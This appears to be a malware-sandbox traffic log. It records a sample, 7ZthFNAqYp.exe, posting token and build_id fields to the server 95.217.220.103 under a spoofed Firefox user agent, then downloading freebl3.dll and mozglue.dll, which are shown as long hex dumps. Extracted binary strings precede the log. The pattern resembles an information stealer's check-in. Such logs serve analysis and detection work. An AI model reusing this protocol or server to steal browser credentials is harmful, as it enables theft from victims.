                                                                                                                                                                                                            xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"*n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED]
                                                                                                                                                                                                            9/I?hKd?81UH!G?#$0|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?*llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!*87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED]
                                                                                                                                                                                                            !5ACPRSWYlm pr

                                                                                                                                                                                                            )Y*"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.64999795.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:26 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 829
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:26 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------CFCFHJDBKJKEBFHJEHIICont
                                                                                                                                                                                                            2024-10-23 05:03:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:47 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:03:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.65000095.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:40 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 437
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:40 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------GIIDBGDAFHJDHIDGDGIICont
                                                                                                                                                                                                            2024-10-23 05:03:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:41 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:03:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            11192.168.2.65000195.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:43 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 437
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:43 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------EHCFBFBAEBKJKEBGCAEHContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------EHCFBFBAEBKJKEBGCAEHCont
                                                                                                                                                                                                            2024-10-23 05:03:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:44 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:03:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            12192.168.2.65000295.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC198OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:45 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 685392
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:45 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: 0c ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff
                                                                                                                                                                                                            Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: f2 c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18
                                                                                                                                                                                                            Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: 8b 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01
                                                                                                                                                                                                            Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: ee 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac
                                                                                                                                                                                                            Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: 00 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9
                                                                                                                                                                                                            Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: c4 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00
                                                                                                                                                                                                            Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: 8b 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff
                                                                                                                                                                                                            Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: 77 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98
                                                                                                                                                                                                            Data Ascii: w8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                                                            2024-10-23 05:03:45 UTC16384INData Raw: e8 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01
                                                                                                                                                                                                            Data Ascii: ,0<48%8A)$


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            13192.168.2.65000395.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:03:47 UTC198OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:03:47 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:03:47 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Wednesday, 23-Oct-2024 05:03:47 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-10-23 05:03:47 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                            2024-10-23 05:03:47 UTC16384INData Raw: 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00
                                                                                                                                                                                                            Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
